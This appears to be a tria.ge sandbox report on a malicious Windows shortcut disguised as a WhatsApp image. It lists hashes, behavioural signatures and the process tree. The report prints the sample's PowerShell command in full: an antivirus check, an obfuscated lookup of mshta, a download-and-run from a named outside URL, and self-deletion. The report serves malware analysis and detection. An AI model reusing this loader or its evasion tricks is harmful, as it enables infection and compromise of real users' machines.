Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29/02/2024, 05:05
Static task
static1
Behavioral task
behavioral1
Sample
WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk
Resource
win10v2004-20240226-en
General
-
Target
WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk
-
Size
1KB
-
MD5
0365118a92333b6faa474aded6b3a6f2
-
SHA1
0bcac8b38e4e338508606c897eb7e36ad9d8a68e
-
SHA256
98e44c818340bc1657402ed6b463ae52247f6d52d45d4a5aa0e6fad5b4935b1e
-
SHA512
08007340cd5d133aae544597937a9cb1de83f29ff068c1aec023f3182dac1b92f7b150d2e0ecb9392f756c8271a759198840718cba82387432093e691dac3eaf
Malware Config
Extracted
https://thanhancompany.com/grip/FYI
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 10 2996 mshta.exe 13 2996 mshta.exe 18 2996 mshta.exe 20 2996 mshta.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation cmd.exe -
Deletes itself 1 IoCs
pid Process 3628 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3628 powershell.exe 3628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3628 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2904 wrote to memory of 3628 2904 cmd.exe 87 PID 2904 wrote to memory of 3628 2904 cmd.exe 87 PID 3628 wrote to memory of 2996 3628 powershell.exe 91 PID 3628 wrote to memory of 2996 3628 powershell.exe 91
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $u = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($v in $u ){if ($v.displayName -replace 'Windows Defender', ''){Exit}}.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://thanhancompany.com/grip/FYI;$SMAF = Get-Location;$SMAF = Join-Path $SMAF 'WhatsApp Görsel 2024-02-28 saat 14.52.35_809ff0ec.jpg.lnk';del $SMAF2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://thanhancompany.com/grip/FYI3⤵
- Blocklisted process makes network request
PID:2996
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82